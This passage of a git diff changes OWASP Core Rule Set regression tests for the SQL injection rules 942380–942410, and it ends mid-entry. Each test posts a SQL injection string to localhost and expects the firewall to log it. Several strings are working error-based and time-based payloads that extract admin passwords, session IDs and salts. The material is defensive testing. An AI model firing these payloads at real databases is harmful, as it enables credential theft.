text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Execute(" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute+elysi" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute node_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute scald" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute system" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute user_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute views" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute patha" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute workb" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute panel" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-43 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-45 + desc: "SQL Injection Attack: EXISTS" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" + version: HTTP/1.0 + output: + log_contains: id "942380" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index 4223f97617..14fbd48002 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -1,23 +1,23 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942390.yaml - tests: - - - test_title: 942390-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942390.yaml +tests: + - test_title: 942390-1 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=sdfsd%27or%201%20%3e%201" - version: HTTP/1.0 - output: - log_contains: id "942390" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=sdfsd%27or%201%20%3e%201" + version: HTTP/1.0 + output: + log_contains: id "942390" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 5ac123380d..f27782cbe3 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -1,24 +1,41 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942400.yaml - tests: - - - test_title: 942400-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942400.yaml +tests: + - test_title: 942400-1 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - # variable name boundary attacks - data: "and '5'orig_var_datavarname=whatever" - version: HTTP/1.0 - output: - log_contains: id "942400" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # variable name boundary attacks + data: "and '5'orig_var_datavarname=whatever" + version: HTTP/1.0 + output: + log_contains: id "942400" + - test_title: 942400-2 + desc: "SQL Injection Attack - false positive" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # variable name boundary attacks + data: "and 7 oranges" + version: HTTP/1.0 + output: + no_log_contains: id "942400" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 38b7e5e222..088603c0fe 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -1,2013 +1,2013 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942410.yaml - tests: - - - test_title: 942410-1 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "ABS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-2 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "benchmark(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-3 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "BENChmARk(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-4 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "cast(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-5 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "CAST(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-6 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "char(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-7 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "chaR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-8 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "chr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-9 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "CHR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-10 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "COALESCE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-11 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Compress (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-12 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "concat (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-13 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "cOnCaT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-14 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "concat_ws(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-15 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "convert(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-16 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "cOnVeRt(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-17 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "COS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-18 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "COUNT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-19 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "CURRENT_USER(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-20 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "database (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-21 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "date(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-22 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=date%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-23 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=day.+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-24 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=day%26%27%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-25 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=decode%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-26 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=default%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-27 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=ELT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-28 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=encode%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-29 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=ExtractValue%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-30 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=EXTRACTVALUE%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-31 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=floor%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-32 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FLOOR+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-33 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=format%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-34 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=GROUP_CONCAT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-35 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=hex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-36 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=hEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-37 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=if+%21%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-38 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=if+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-39 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=if%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-40 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=if%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-41 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=IFNULL%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-42 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=in+%27%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-43 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=IN+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-44 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=IN%2F%2A%2A%2F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-45 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=insert%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-46 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=left%27%29%3F%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-47 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=LEFT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-48 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%7C%7C%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-49 - desc: 